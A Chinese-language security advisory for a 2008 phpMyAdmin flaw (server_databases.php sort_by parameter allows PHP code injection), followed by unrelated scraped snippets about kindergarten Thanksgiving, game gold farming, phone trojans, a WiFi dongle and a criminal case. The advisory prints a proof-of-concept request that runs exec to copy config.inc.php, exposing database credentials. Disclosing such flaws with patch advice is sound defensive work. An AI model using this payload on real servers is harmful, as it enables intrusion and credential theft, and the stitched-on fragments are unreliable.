发布日期:2008-09-15更新日期:2008-09-17 受影响系统: phpMyAdmin phpMyAdmin < 2.11.9.1 不受影响系统: phpMyAdmin phpMyAdmin 2.11.9.1 描述:BUGTRAQ ID: 31188 phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。 phpMyAdmin的server_databases.php脚本没有正确地过滤对sort_by参数的输入,远程攻击者可以通过提交恶意请求注入并执行任意PHP代码。 <*来源:Norman Hippert 链接:http://secuni *** /advisories/31884http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2008-7http://fd.the-wildcat.de/pma_e36a091q11.php*> 测试 *** : 警 告 以下程序( *** )可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token] 建议:厂商补丁: phpMyAdmin----------目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://cache.gmane.org//gmane/comp/security/oss/general/947-001.bin from:http://www.nsfocus.net/vulndb/12387
幼儿园感恩节活动( 幼儿园感恩节活动策划) 人生极为重要的三件事便是:用宽容的心对待世界,对待生活;用快乐的心创造世界,改变生活;用感恩的心感受世界,感受生活!本月的感恩节你准备好了吗?下面的感恩...
网易《倩女幽魂》,一款很老的游戏了,今年是八周年庆。目前做这款游戏的人很多,但大部分都只能一个月三四千的样子,当然也有不少可以过万的。说说这款游戏怎么赚钱,还有一些游戏日常打金的细节。 一...
具体步骤一定要看上面的视频! 太简单了。。。什么复制SIM卡,信号拦截,间谍卫星就不谈了,一般人黑客也犯不上用。 通过让你下载一些木马后台软件,进而入侵操控你的手机,所以一般别下载来路不明的...
看你属强了高于180的话明与暗好一些,高18010白字和40属强差不多,40属强石头面板应该不会比明与暗高吧,印象中明与暗面板很高 dnf湖南5去明与暗多几多钱少钱 现票价都1.4~1.5...
还记得当时风靡办公室的360随身WiFi么?不少办公室的白领和学生朋友们,使用这个小小的设备,解决了自己的手机、平板电脑等无法通过WiFi上网的难题。现在,360随身WiFi推出了第三代的产品,硬件性...
不知道大家是否还记得广西“百香果女童被奸杀案”,这个百香果女孩遇害事件是最近有了新的进展,据最新消息报道最高法指令再审百香果女孩案,那么大家知道百香果女孩案件最新进展是怎么样的,这个百香果女孩案是怎么...